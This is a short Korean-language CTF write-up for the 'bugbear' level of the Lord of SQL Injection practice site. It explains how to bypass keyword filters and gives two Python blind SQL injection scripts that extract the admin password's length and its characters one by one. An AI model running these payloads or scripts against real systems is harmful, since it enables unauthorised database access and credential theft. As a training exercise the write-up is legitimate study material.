bugbear

문제 정보

문제 접근

1. '(싱글쿼터) 필터링 + substr, ascii, =, or, and, 공백, like, 0x 필터링

2. Blind SQL Injection

 2.1 pw의 길이 구하기 

 

or, and 연산자 -> %26%26, || 으로 우회

like, = 연산자 -> in 으로 우회

import requests

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?'

cookie={"PHPSESSID":"ehfeb49bjnrn7o6flaqbts8u2v"}

for i in range(1,100):
    params ='no=1/**/||/**/id/**/in/**/("admin")/**/%26%26/**/length(pw)/**/in("'+str(i)+'")'
    response=requests.get(url,cookies=cookie,params=params)
    if "Hello admin" in response.text:
        print(i)
        break

 

 2.2 pw의 값 구하기

substr 함수 -> min 함수로 우회

 

import requests
import string

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?'

cookie={"PHPSESSID":"ehfeb49bjnrn7o6flaqbts8u2v"}

string = string.ascii_lowercase + string.digits

ch = ''

for i in range(1,9):
    print("pw의 {}번째 길이 : ".format(i))
    for j in string:
        params ='no=1/**/||/**/id/**/in/**/("admin")/**/%26%26/**/mid(pw,'+str(i)+',1)/**/in("'+str(j)+'")'
        response=requests.get(url,cookies=cookie,params=params)
        if "Hello admin" in response.text:
            ch += j
            print(ch)
            break